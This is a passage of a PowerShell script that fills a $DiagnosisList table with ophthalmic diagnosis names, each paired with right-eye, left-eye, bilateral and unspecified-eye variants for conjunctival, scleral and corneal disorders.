abnormalities of conjunctiva, bilateral") + $null = $DiagnosisList.Rows.Add("Vascular abnormalities of conjunctiva","Vascular abnormalities of conjunctiva, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival edema","Conjunctival edema, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival edema","Conjunctival edema, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival edema","Conjunctival edema, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival edema","Conjunctival edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hyperemia","Conjunctival hyperemia, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hyperemia","Conjunctival hyperemia, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hyperemia","Conjunctival hyperemia, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival hyperemia","Conjunctival hyperemia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival cysts","Conjunctival cysts, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival cysts","Conjunctival cysts, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival cysts","Conjunctival cysts, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival cysts","Conjunctival cysts, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pseudopterygium of conjunctiva","Pseudopterygium of conjunctiva, right eye") + $null = $DiagnosisList.Rows.Add("Pseudopterygium of conjunctiva","Pseudopterygium of conjunctiva, left eye") + $null = $DiagnosisList.Rows.Add("Pseudopterygium of conjunctiva","Pseudopterygium of conjunctiva, bilateral") + $null = $DiagnosisList.Rows.Add("Pseudopterygium of conjunctiva","Pseudopterygium of conjunctiva, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctivochalasis","Conjunctivochalasis, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctivochalasis","Conjunctivochalasis, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctivochalasis","Conjunctivochalasis, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctivochalasis","Conjunctivochalasis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of conjunctiva","Other specified disorders of conjunctiva") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of conjunctiva","Unspecified disorder of conjunctiva") + $null = $DiagnosisList.Rows.Add("Unspecified scleritis","Unspecified scleritis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified scleritis","Unspecified scleritis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified scleritis","Unspecified scleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified scleritis","Unspecified scleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anterior scleritis","Anterior scleritis, right eye") + $null = $DiagnosisList.Rows.Add("Anterior scleritis","Anterior scleritis, left eye") + $null = $DiagnosisList.Rows.Add("Anterior scleritis","Anterior scleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Anterior scleritis","Anterior scleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Brawny scleritis","Brawny scleritis, right eye") + $null = $DiagnosisList.Rows.Add("Brawny scleritis","Brawny scleritis, left eye") + $null = $DiagnosisList.Rows.Add("Brawny scleritis","Brawny scleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Brawny scleritis","Brawny scleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior scleritis","Posterior scleritis, right eye") + $null = $DiagnosisList.Rows.Add("Posterior scleritis","Posterior scleritis, left eye") + $null = $DiagnosisList.Rows.Add("Posterior scleritis","Posterior scleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Posterior scleritis","Posterior scleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Scleritis with corneal involvement","Scleritis with corneal involvement, right eye") + $null = $DiagnosisList.Rows.Add("Scleritis with corneal involvement","Scleritis with corneal involvement, left eye") + $null = $DiagnosisList.Rows.Add("Scleritis with corneal involvement","Scleritis with corneal involvement, bilateral") + $null = $DiagnosisList.Rows.Add("Scleritis with corneal involvement","Scleritis with corneal involvement, unspecified eye") + $null = $DiagnosisList.Rows.Add("Scleromalacia perforans","Scleromalacia perforans, right eye") + $null = $DiagnosisList.Rows.Add("Scleromalacia perforans","Scleromalacia perforans, left eye") + $null = $DiagnosisList.Rows.Add("Scleromalacia perforans","Scleromalacia perforans, bilateral") + $null = $DiagnosisList.Rows.Add("Scleromalacia perforans","Scleromalacia perforans, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other scleritis","Other scleritis, right eye") + $null = $DiagnosisList.Rows.Add("Other scleritis","Other scleritis, left eye") + $null = $DiagnosisList.Rows.Add("Other scleritis","Other scleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Other scleritis","Other scleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified episcleritis","Unspecified episcleritis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified episcleritis","Unspecified episcleritis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified episcleritis","Unspecified episcleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified episcleritis","Unspecified episcleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Episcleritis periodica fugax","Episcleritis periodica fugax, right eye") + $null = $DiagnosisList.Rows.Add("Episcleritis periodica fugax","Episcleritis periodica fugax, left eye") + $null = $DiagnosisList.Rows.Add("Episcleritis periodica fugax","Episcleritis periodica fugax, bilateral") + $null = $DiagnosisList.Rows.Add("Episcleritis periodica fugax","Episcleritis periodica fugax, unspecified eye") + $null = $DiagnosisList.Rows.Add("Nodular episcleritis","Nodular episcleritis, right eye") + $null = $DiagnosisList.Rows.Add("Nodular episcleritis","Nodular episcleritis, left eye") + $null = $DiagnosisList.Rows.Add("Nodular episcleritis","Nodular episcleritis, bilateral") + $null = $DiagnosisList.Rows.Add("Nodular episcleritis","Nodular episcleritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Equatorial staphyloma","Equatorial staphyloma, right eye") + $null = $DiagnosisList.Rows.Add("Equatorial staphyloma","Equatorial staphyloma, left eye") + $null = $DiagnosisList.Rows.Add("Equatorial staphyloma","Equatorial staphyloma, bilateral") + $null = $DiagnosisList.Rows.Add("Equatorial staphyloma","Equatorial staphyloma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Localized anterior staphyloma","Localized anterior staphyloma, right eye") + $null = $DiagnosisList.Rows.Add("Localized anterior staphyloma","Localized anterior staphyloma, left eye") + $null = $DiagnosisList.Rows.Add("Localized anterior staphyloma","Localized anterior staphyloma, bilateral") + $null = $DiagnosisList.Rows.Add("Localized anterior staphyloma","Localized anterior staphyloma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Staphyloma posticum","Staphyloma posticum, right eye") + $null = $DiagnosisList.Rows.Add("Staphyloma posticum","Staphyloma posticum, left eye") + $null = $DiagnosisList.Rows.Add("Staphyloma posticum","Staphyloma posticum, bilateral") + $null = $DiagnosisList.Rows.Add("Staphyloma posticum","Staphyloma posticum, unspecified eye") + $null = $DiagnosisList.Rows.Add("Scleral ectasia","Scleral ectasia, right eye") + $null = $DiagnosisList.Rows.Add("Scleral ectasia","Scleral ectasia, left eye") + $null = $DiagnosisList.Rows.Add("Scleral ectasia","Scleral ectasia, bilateral") + $null = $DiagnosisList.Rows.Add("Scleral ectasia","Scleral ectasia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ring staphyloma","Ring staphyloma, right eye") + $null = $DiagnosisList.Rows.Add("Ring staphyloma","Ring staphyloma, left eye") + $null = $DiagnosisList.Rows.Add("Ring staphyloma","Ring staphyloma, bilateral") + $null = $DiagnosisList.Rows.Add("Ring staphyloma","Ring staphyloma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of sclera","Other disorders of sclera") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of sclera","Unspecified disorder of sclera") + $null = $DiagnosisList.Rows.Add("Unspecified corneal ulcer","Unspecified corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal ulcer","Unspecified corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal ulcer","Unspecified corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified corneal ulcer","Unspecified corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Central corneal ulcer","Central corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Central corneal ulcer","Central corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Central corneal ulcer","Central corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Central corneal ulcer","Central corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ring corneal ulcer","Ring corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Ring corneal ulcer","Ring corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Ring corneal ulcer","Ring corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Ring corneal ulcer","Ring corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Corneal ulcer with hypopyon","Corneal ulcer with hypopyon, right eye") + $null = $DiagnosisList.Rows.Add("Corneal ulcer with hypopyon","Corneal ulcer with hypopyon, left eye") + $null = $DiagnosisList.Rows.Add("Corneal ulcer with hypopyon","Corneal ulcer with hypopyon, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal ulcer with hypopyon","Corneal ulcer with hypopyon, unspecified eye") + $null = $DiagnosisList.Rows.Add("Marginal corneal ulcer","Marginal corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Marginal corneal ulcer","Marginal corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Marginal corneal ulcer","Marginal corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Marginal corneal ulcer","Marginal corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Mooren's corneal ulcer","Mooren's corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Mooren's corneal ulcer","Mooren's corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Mooren's corneal ulcer","Mooren's corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Mooren's corneal ulcer","Mooren's corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Mycotic corneal ulcer","Mycotic corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Mycotic corneal ulcer","Mycotic corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Mycotic corneal ulcer","Mycotic corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Mycotic corneal ulcer","Mycotic corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Perforated corneal ulcer","Perforated corneal ulcer, right eye") + $null = $DiagnosisList.Rows.Add("Perforated corneal ulcer","Perforated corneal ulcer, left eye") + $null = $DiagnosisList.Rows.Add("Perforated corneal ulcer","Perforated corneal ulcer, bilateral") + $null = $DiagnosisList.Rows.Add("Perforated corneal ulcer","Perforated corneal ulcer, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified superficial keratitis","Unspecified superficial keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified superficial keratitis","Unspecified superficial keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified superficial keratitis","Unspecified superficial keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified superficial keratitis","Unspecified superficial keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Macular keratitis","Macular keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Macular keratitis","Macular keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Macular keratitis","Macular keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Macular keratitis","Macular keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Filamentary keratitis","Filamentary keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Filamentary keratitis","Filamentary keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Filamentary keratitis","Filamentary keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Filamentary keratitis","Filamentary keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Photokeratitis","Photokeratitis, right eye") + $null = $DiagnosisList.Rows.Add("Photokeratitis","Photokeratitis, left eye") + $null = $DiagnosisList.Rows.Add("Photokeratitis","Photokeratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Photokeratitis","Photokeratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Punctate keratitis","Punctate keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Punctate keratitis","Punctate keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Punctate keratitis","Punctate keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Punctate keratitis","Punctate keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified keratoconjunctivitis","Unspecified keratoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified keratoconjunctivitis","Unspecified keratoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified keratoconjunctivitis","Unspecified keratoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified keratoconjunctivitis","Unspecified keratoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Exposure keratoconjunctivitis","Exposure keratoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Exposure keratoconjunctivitis","Exposure keratoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Exposure keratoconjunctivitis","Exposure keratoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Exposure keratoconjunctivitis","Exposure keratoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Keratoconjunctivitis sicca, not specified as Sjogren's","Keratoconjunctivitis sicca, not specified as Sjogren's, right eye") + $null = $DiagnosisList.Rows.Add("Keratoconjunctivitis sicca, not specified as Sjogren's","Keratoconjunctivitis sicca, not specified as Sjogren's, left eye") + $null = $DiagnosisList.Rows.Add("Keratoconjunctivitis sicca, not specified as Sjogren's","Keratoconjunctivitis sicca, not specified as Sjogren's, bilateral") + $null = $DiagnosisList.Rows.Add("Keratoconjunctivitis sicca, not specified as Sjogren's","Keratoconjunctivitis sicca, not specified as Sjogren's, unspecified eye") + $null = $DiagnosisList.Rows.Add("Neurotrophic keratoconjunctivitis","Neurotrophic keratoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Neurotrophic keratoconjunctivitis","Neurotrophic keratoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Neurotrophic keratoconjunctivitis","Neurotrophic keratoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Neurotrophic keratoconjunctivitis","Neurotrophic keratoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ophthalmia nodosa","Ophthalmia nodosa, right eye") + $null = $DiagnosisList.Rows.Add("Ophthalmia nodosa","Ophthalmia nodosa, left eye") + $null = $DiagnosisList.Rows.Add("Ophthalmia nodosa","Ophthalmia nodosa, bilateral") + $null = $DiagnosisList.Rows.Add("Ophthalmia nodosa","Ophthalmia nodosa, unspecified eye") + $null = $DiagnosisList.Rows.Add("Phlyctenular keratoconjunctivitis","Phlyctenular keratoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Phlyctenular keratoconjunctivitis","Phlyctenular keratoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Phlyctenular keratoconjunctivitis","Phlyctenular keratoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Phlyctenular keratoconjunctivitis","Phlyctenular keratoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vernal keratoconjunctivitis, with limbar and corneal involvement","Vernal keratoconjunctivitis, with limbar and corneal involvement, right eye") + $null = $DiagnosisList.Rows.Add("Vernal keratoconjunctivitis, with limbar and corneal involvement","Vernal keratoconjunctivitis, with limbar and corneal involvement, left eye") + $null = $DiagnosisList.Rows.Add("Vernal keratoconjunctivitis, with limbar and corneal involvement","Vernal keratoconjunctivitis, with limbar and corneal involvement, bilateral") + $null = $DiagnosisList.Rows.Add("Vernal keratoconjunctivitis, with limbar and corneal involvement","Vernal keratoconjunctivitis, with limbar and corneal involvement, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other keratoconjunctivitis","Other keratoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Other keratoconjunctivitis","Other keratoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Other keratoconjunctivitis","Other keratoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Other keratoconjunctivitis","Other keratoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified interstitial keratitis","Unspecified interstitial keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified interstitial keratitis","Unspecified interstitial keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified interstitial keratitis","Unspecified interstitial keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified interstitial keratitis","Unspecified interstitial keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Corneal abscess","Corneal abscess, right eye") + $null = $DiagnosisList.Rows.Add("Corneal abscess","Corneal abscess, left eye") + $null = $DiagnosisList.Rows.Add("Corneal abscess","Corneal abscess, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal abscess","Corneal abscess, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diffuse interstitial keratitis","Diffuse interstitial keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Diffuse interstitial keratitis","Diffuse interstitial keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Diffuse interstitial keratitis","Diffuse interstitial keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Diffuse interstitial keratitis","Diffuse interstitial keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Sclerosing keratitis","Sclerosing keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Sclerosing keratitis","Sclerosing keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Sclerosing keratitis","Sclerosing keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Sclerosing keratitis","Sclerosing keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other interstitial and deep keratitis","Other interstitial and deep keratitis, right eye") + $null = $DiagnosisList.Rows.Add("Other interstitial and deep keratitis","Other interstitial and deep keratitis, left eye") + $null = $DiagnosisList.Rows.Add("Other interstitial and deep keratitis","Other interstitial and deep keratitis, bilateral") + $null = $DiagnosisList.Rows.Add("Other interstitial and deep keratitis","Other interstitial and deep keratitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal neovascularization","Unspecified corneal neovascularization, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal neovascularization","Unspecified corneal neovascularization, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal neovascularization","Unspecified corneal neovascularization, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified corneal neovascularization","Unspecified corneal neovascularization, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ghost vessels (corneal)","Ghost vessels (corneal), right eye") + $null = $DiagnosisList.Rows.Add("Ghost vessels (corneal)","Ghost vessels (corneal), left eye") + $null = $DiagnosisList.Rows.Add("Ghost vessels (corneal)","Ghost vessels (corneal), bilateral") + $null = $DiagnosisList.Rows.Add("Ghost vessels (corneal)","Ghost vessels (corneal), unspecified eye") + $null = $DiagnosisList.Rows.Add("Pannus (corneal)","Pannus (corneal), right eye") + $null = $DiagnosisList.Rows.Add("Pannus (corneal)","Pannus (corneal), left eye") + $null = $DiagnosisList.Rows.Add("Pannus (corneal)","Pannus (corneal), bilateral") + $null = $DiagnosisList.Rows.Add("Pannus (corneal)","Pannus (corneal), unspecified eye") + $null = $DiagnosisList.Rows.Add("Localized vascularization of cornea","Localized vascularization of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Localized vascularization of cornea","Localized vascularization of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Localized vascularization of cornea","Localized vascularization of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Localized vascularization of cornea","Localized vascularization of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Deep vascularization of cornea","Deep vascularization of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Deep vascularization of cornea","Deep vascularization of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Deep vascularization of cornea","Deep vascularization of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Deep vascularization of cornea","Deep vascularization of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other keratitis","Other keratitis") + $null = $DiagnosisList.Rows.Add("Unspecified keratitis","Unspecified keratitis") + $null = $DiagnosisList.Rows.Add("Adherent leukoma","Adherent leukoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Adherent leukoma","Adherent leukoma, right eye") + $null = $DiagnosisList.Rows.Add("Adherent leukoma","Adherent leukoma, left eye") + $null = $DiagnosisList.Rows.Add("Adherent leukoma","Adherent leukoma, bilateral") + $null = $DiagnosisList.Rows.Add("Central corneal opacity","Central corneal opacity, unspecified eye") + $null = $DiagnosisList.Rows.Add("Central corneal opacity","Central corneal opacity, right eye") + $null = $DiagnosisList.Rows.Add("Central corneal opacity","Central corneal opacity, left eye") + $null = $DiagnosisList.Rows.Add("Central corneal opacity","Central corneal opacity, bilateral") + $null = $DiagnosisList.Rows.Add("Minor opacity of cornea","Minor opacity of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Minor opacity of cornea","Minor opacity of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Minor opacity of cornea","Minor opacity of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Minor opacity of cornea","Minor opacity of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Peripheral opacity of cornea","Peripheral opacity of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Peripheral opacity of cornea","Peripheral opacity of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Peripheral opacity of cornea","Peripheral opacity of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Peripheral opacity of cornea","Peripheral opacity of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other corneal scars and opacities","Other corneal scars and opacities") + $null = $DiagnosisList.Rows.Add("Unspecified corneal scar and opacity","Unspecified corneal scar and opacity") + $null = $DiagnosisList.Rows.Add("Unspecified corneal deposit","Unspecified corneal deposit, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal deposit","Unspecified corneal deposit, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified corneal deposit","Unspecified corneal deposit, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified corneal deposit","Unspecified corneal deposit, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anterior corneal pigmentations","Anterior corneal pigmentations, right eye") + $null = $DiagnosisList.Rows.Add("Anterior corneal pigmentations","Anterior corneal pigmentations, left eye") + $null = $DiagnosisList.Rows.Add("Anterior corneal pigmentations","Anterior corneal pigmentations, bilateral") + $null = $DiagnosisList.Rows.Add("Anterior corneal pigmentations","Anterior corneal pigmentations, unspecified eye") + $null = $DiagnosisList.Rows.Add("Argentous corneal deposits","Argentous corneal deposits, right eye") + $null = $DiagnosisList.Rows.Add("Argentous corneal deposits","Argentous corneal deposits, left eye") + $null = $DiagnosisList.Rows.Add("Argentous corneal deposits","Argentous corneal deposits, bilateral") + $null = $DiagnosisList.Rows.Add("Argentous corneal deposits","Argentous corneal deposits, unspecified eye") + $null = $DiagnosisList.Rows.Add("Corneal deposits in metabolic disorders","Corneal deposits in metabolic disorders, right eye") + $null = $DiagnosisList.Rows.Add("Corneal deposits in metabolic disorders","Corneal deposits in metabolic disorders, left eye") + $null = $DiagnosisList.Rows.Add("Corneal deposits in metabolic disorders","Corneal deposits in metabolic disorders, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal deposits in metabolic disorders","Corneal deposits in metabolic disorders, unspecified eye") + $null = $DiagnosisList.Rows.Add("Kayser-Fleischer ring","Kayser-Fleischer ring, right eye") + $null = $DiagnosisList.Rows.Add("Kayser-Fleischer ring","Kayser-Fleischer ring, left eye") + $null = $DiagnosisList.Rows.Add("Kayser-Fleischer ring","Kayser-Fleischer ring, bilateral") + $null = $DiagnosisList.Rows.Add("Kayser-Fleischer ring","Kayser-Fleischer ring, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior corneal pigmentations","Posterior corneal pigmentations, right eye") + $null = $DiagnosisList.Rows.Add("Posterior corneal pigmentations","Posterior corneal pigmentations, left eye") + $null = $DiagnosisList.Rows.Add("Posterior corneal pigmentations","Posterior corneal pigmentations, bilateral") + $null = $DiagnosisList.Rows.Add("Posterior corneal pigmentations","Posterior corneal pigmentations, unspecified eye") + $null = $DiagnosisList.Rows.Add("Stromal corneal pigmentations","Stromal corneal pigmentations, right eye") + $null = $DiagnosisList.Rows.Add("Stromal corneal pigmentations","Stromal corneal pigmentations, left eye") + $null = $DiagnosisList.Rows.Add("Stromal corneal pigmentations","Stromal corneal pigmentations, bilateral") + $null = $DiagnosisList.Rows.Add("Stromal corneal pigmentations","Stromal corneal pigmentations, unspecified eye") + $null = $DiagnosisList.Rows.Add("Bullous keratopathy","Bullous keratopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Bullous keratopathy","Bullous keratopathy, right eye") + $null = $DiagnosisList.Rows.Add("Bullous keratopathy","Bullous keratopathy, left eye") + $null = $DiagnosisList.Rows.Add("Bullous keratopathy","Bullous keratopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Other and unspecified corneal edema","Unspecified corneal edema") + $null = $DiagnosisList.Rows.Add("Corneal edema secondary to contact lens","Corneal edema secondary to contact lens, right eye") + $null = $DiagnosisList.Rows.Add("Corneal edema secondary to contact lens","Corneal edema secondary to contact lens, left eye") + $null = $DiagnosisList.Rows.Add("Corneal edema secondary to contact lens","Corneal edema secondary to contact lens, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal edema secondary to contact lens","Corneal edema secondary to contact lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Idiopathic corneal edema","Idiopathic corneal edema, right eye") + $null = $DiagnosisList.Rows.Add("Idiopathic corneal edema","Idiopathic corneal edema, left eye") + $null = $DiagnosisList.Rows.Add("Idiopathic corneal edema","Idiopathic corneal edema, bilateral") + $null = $DiagnosisList.Rows.Add("Idiopathic corneal edema","Idiopathic corneal edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Secondary corneal edema","Secondary corneal edema, right eye") + $null = $DiagnosisList.Rows.Add("Secondary corneal edema","Secondary corneal edema, left eye") + $null = $DiagnosisList.Rows.Add("Secondary corneal edema","Secondary corneal edema, bilateral") + $null = $DiagnosisList.Rows.Add("Secondary corneal edema","Secondary corneal edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Changes of corneal membranes","Unspecified corneal membrane change") + $null = $DiagnosisList.Rows.Add("Folds and rupture in Bowman's membrane","Folds and rupture in Bowman's membrane, right eye") + $null = $DiagnosisList.Rows.Add("Folds and rupture in Bowman's membrane","Folds and rupture in Bowman's membrane, left eye") + $null = $DiagnosisList.Rows.Add("Folds and rupture in Bowman's membrane","Folds and rupture in Bowman's membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Folds and rupture in Bowman's membrane","Folds and rupture in Bowman's membrane, unspecified eye") + $null = $DiagnosisList.Rows.Add("Folds in Descemet's membrane","Folds in Descemet's membrane, right eye") + $null = $DiagnosisList.Rows.Add("Folds in Descemet's membrane","Folds in Descemet's membrane, left eye") + $null = $DiagnosisList.Rows.Add("Folds in Descemet's membrane","Folds in Descemet's membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Folds in Descemet's membrane","Folds in Descemet's membrane, unspecified eye") + $null = $DiagnosisList.Rows.Add("Rupture in Descemet's membrane","Rupture in Descemet's membrane, right eye") + $null = $DiagnosisList.Rows.Add("Rupture in Descemet's membrane","Rupture in Descemet's membrane, left eye") + $null = $DiagnosisList.Rows.Add("Rupture in Descemet's membrane","Rupture in Descemet's membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Rupture in Descemet's membrane","Rupture in Descemet's membrane, unspecified eye") + $null = $DiagnosisList.Rows.Add("Corneal degeneration","Unspecified corneal degeneration") + $null = $DiagnosisList.Rows.Add("Arcus senilis","Arcus senilis, right eye") + $null = $DiagnosisList.Rows.Add("Arcus senilis","Arcus senilis, left eye") + $null = $DiagnosisList.Rows.Add("Arcus senilis","Arcus senilis, bilateral") + $null = $DiagnosisList.Rows.Add("Arcus senilis","Arcus senilis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Band keratopathy","Band keratopathy, right eye") + $null = $DiagnosisList.Rows.Add("Band keratopathy","Band keratopathy, left eye") + $null = $DiagnosisList.Rows.Add("Band keratopathy","Band keratopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Band keratopathy","Band keratopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other calcerous corneal degeneration","Other calcerous corneal degeneration") + $null = $DiagnosisList.Rows.Add("Keratomalacia","Keratomalacia, right eye") + $null = $DiagnosisList.Rows.Add("Keratomalacia","Keratomalacia, left eye") + $null = $DiagnosisList.Rows.Add("Keratomalacia","Keratomalacia, bilateral") + $null = $DiagnosisList.Rows.Add("Keratomalacia","Keratomalacia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Nodular corneal degeneration","Nodular corneal degeneration, right eye") + $null = $DiagnosisList.Rows.Add("Nodular corneal degeneration","Nodular corneal degeneration, left eye") + $null = $DiagnosisList.Rows.Add("Nodular corneal degeneration","Nodular corneal degeneration, bilateral") + $null = $DiagnosisList.Rows.Add("Nodular corneal degeneration","Nodular corneal degeneration, unspecified eye") + $null = 